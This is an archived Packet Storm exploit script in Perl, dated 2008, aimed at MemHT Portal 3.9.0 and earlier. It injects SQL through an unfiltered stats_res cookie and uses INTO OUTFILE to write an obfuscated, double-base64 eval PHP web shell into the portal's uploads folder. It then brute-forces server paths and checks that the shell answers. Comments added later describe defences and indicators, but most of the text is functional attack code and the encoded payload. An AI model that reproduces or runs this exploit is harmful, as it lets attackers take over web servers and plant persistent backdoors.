
memht-shell.txt

🗓️ 08 Sep 2008 00:00:00 — Reported by Ams. Type: packetstorm
🔗 Source: packetstormsecurity.com

MemHT Portal <= 3.9.0 Perl exploit that creates a shell in /uploads/media/defined.php by way of an unfiltered $_COOKIE value and SQL injection

`#!/usr/bin/perl  
#  
# MemHT Portal <= 3.9.0 Perl exploit  
#  
# discovered & written by Ams  
# ax330d [doggy] gmail [dot] com  
#  
# DESCRIPTION:  
# Script /inc/inc_statistics.php reads $_COOKIE['stats_res'] without filtering  
# and later uses it in a MySQL query, so SQL injection is possible.  
# This exploit tries to create a shell in /uploads/media/defined.php.  
#  
# NEEDED:  
# magic_quotes_gpc = off  
# MySQL must be able to write files on the server  
# The full server path to the portal must be known  
  
use strict;  
use warnings;  
use IO::Socket;  
  
print "  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
MemHT portal <= 3.9.0 Perl exploit  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
";  
  
# Argument handling.  usage() is called (and exits) when no arguments are
# given or when the first argument does not contain "http://".  The check
# is an unanchored substring match, not a URL validation.  The legacy
# &usage call form is used here; see usage() at the bottom of the file.
@ARGV or &usage ;  
my $expl_url = shift;  
$expl_url =~ m#http://# or &usage;  
# Second argument: absolute filesystem path of the portal's document root.
# '-b' (the default) means "unknown, try the candidates in @paths".
my $serv_path = shift || '-b';  
# Where the dropped file is expected to appear, relative to the portal root.
my $def_shell = '/uploads/media/defined.php';  
  
# URL-encoded PHP stub that the SQL injection in exploit() writes to disk.
# It assigns a long base64 blob to $s and then runs
# eval(base64_decode(base64_decode($s))) -- a double-base64 dropper.  The
# decoded payload is not shown on this page.  For defenders, a file under
# /uploads/ containing the literal `eval(base64_decode(base64_decode(` is
# a strong indicator of this family of dropped web shells, and upload
# directories should not be executable by the web server in the first place.
my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q'  
.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ'  
.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4'  
.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk'  
.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX'  
.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth'  
.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53'  
.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO'  
.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp'  
.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV'  
.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu'  
.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow'  
.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'  
.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ'  
.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU'  
.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa'  
.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH'  
.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa'  
.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr'  
.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN'  
.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt'  
.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP'  
.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3'  
.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0'  
.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y'  
.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ'  
.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2'  
.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds'  
.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT'  
.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ'  
.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4'  
.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ'  
.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT'  
.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa'  
.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw'  
.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK'  
.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH'  
.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27'  
.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';  
  
# You can add more :P  
# Candidate document roots, tried one after another by exploit() when the
# real path could not be read from the cron.php error output.
my @paths = qw(  
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts  
/home/www home/httpd/vhosts  
/usr/local/apache/htdocs  
/www/htdocs  
);  
  
# A path given on the command line replaces the whole candidate list.
if($serv_path ne '-b') {  
@paths = ($serv_path);  
}  
  
# Entry point: everything below this line is subroutine definitions.
exploit($expl_url);  
  
sub exploit {  
  
# Runs the attack against one portal URL in three steps: (1) try to learn
# the document root from a PHP notice returned by /cron.php, (2) send the
# injected cookie once per candidate root, (3) request the expected shell
# URL and look for a marker in the response.
# Argument: the portal URL, taken from the end of @_.  Returns nothing
# meaningful; prints progress and exit()s when a connection fails.
# Reads the file-scoped lexicals $serv_path, @paths and $def_shell, and
# assigns to $serv_path in the foreach below (no `my`, so the loop aliases
# the outer variable rather than declaring a new one).
# Defining vars.  
my $url = pop @_;  
  
print "\n\tExploiting $url\n";  
  
my($host, $path, $packet, $rcvd);  
# Splits the URL with a /e substitution: $host becomes everything after
# "http://" up to the first "/", $path the remainder with a trailing "/"
# removed.  $url itself is not referenced after this line.
$url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;  
  
# Trying to get /cron.php to get server path  
# Step 1: an empty POST to cron.php with the response captured ($ret=1).
# When PHP notices are shown to clients, the reply contains
# "Undefined variable:" and a "... in <absolute path>/inc/inc_readConfig"
# fragment from which the document root is taken.  This is a path
# disclosure; the server-side fix is display_errors=Off (log_errors=On)
# in production.
$packet = "POST $path/cron.php HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
$rcvd = send_pckt($host, $packet, 1);  
  
if( ! $rcvd) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
if ($rcvd =~ /Undefined variable:/) {  
$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;  
@paths = ($1);  
print "\n\tFound path!\n";  
} else {  
print "\n\tStarting bruteforce...\n";  
}  
  
# Some bruteforce here if path is not defined  
# Step 2: the injection itself.  The stats_res cookie closes the string
# literal, appends UNION SELECT '<stub>' INTO OUTFILE '<root><path><def_shell>'
# and comments out the rest of the query.  For this to do anything the
# application must put the raw cookie value into SQL, the database account
# must hold the FILE privilege, secure_file_priv must not forbid the
# location, and the mysqld user must be able to write into the web root.
# Each of those is a defensive control: parameterized queries and cookie
# validation in the application, no FILE privilege for the web
# application's database user, a restrictive secure_file_priv, and a web
# root that mysqld cannot write to.  The response is discarded here
# (send_pckt is called without $ret); success is inferred only in step 3.
foreach $serv_path (@paths) {  
  
print ("\n\tTesting $serv_path$path$def_shell ...\n");  
# Sending poisoned request  
$packet = "POST $path/index.php HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
  
if( ! send_pckt($host, $packet)) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
}  
  
# Checking for shell presence  
# Step 3: request the expected shell URL (after a one-second pause) and
# grep the captured response for "tmp shell" -- presumably text emitted by
# the dropped page; the decoded payload is not visible here, so that is an
# assumption.  On the defender's side, a request for
# /uploads/media/defined.php in the access log, or that file appearing on
# disk, is the artifact to alert on.
$packet = "POST $path$def_shell HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
  
sleep(1);  
$rcvd = send_pckt($host, $packet, 1);  
if( ! $rcvd) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
  
if ($rcvd =~ /tmp\s+shell/) {  
print "\n\tExploited!\n\n";  
} else {  
print "\n\tExploiting failed.\n\n";  
}  
  
}  
  
sub send_pckt() {  
  
# Opens a plain TCP connection to $host on port 80, writes $packet, and --
# only when $ret is true -- reads the reply until the peer closes the
# socket (the requests above all send "Connection: Close").
# Arguments: ($host, $packet, $ret).
# Returns 0 when the connection cannot be opened.  Otherwise returns the
# string "1" followed by the raw reply (status line and headers included)
# when $ret is true, or just "1" when it is false, so a successful send is
# always a true value.
# Notes: the empty () prototype has no effect on the calls in exploit(),
# which are compiled before this definition.  No Timeout is passed to
# IO::Socket::INET, so an unresponsive host can block the script; there is
# no TLS and the port is fixed.
my $dat = 1;  
my ($host, $packet, $ret) = @_;  
my $socket = IO::Socket::INET->new(  
Proto=>"tcp",  
PeerAddr=>$host,  
PeerPort=>"80"  
);  
if( ! $socket) {  
return 0;  
} else {  
  
print $socket $packet;  
if($ret) {  
my $rcv;  
while($rcv = <$socket>) {  
$dat .= $rcv;  
}  
}  
close $socket;  
return $dat;  
}  
}  
  
sub usage {  
# Prints the command-line synopsis, interpolating $0 as the script name,
# and exits the process.  Invoked from the argument checks at file scope
# with the legacy &usage call form.
print "\n\tUsage:\texpl.pl host [-b|full server path]  
  
(by default exlpoit checks /cron.php file errors to get real path,  
otherwise it will brute if failed, if used -b or none path is mentioned)  
  
Example:\t$0 http://localhost/ /var/www/htdocs  
$0 http://localhost/ -b  
$0 http://localhost/\n\n";  
exit;  
}  
  
  
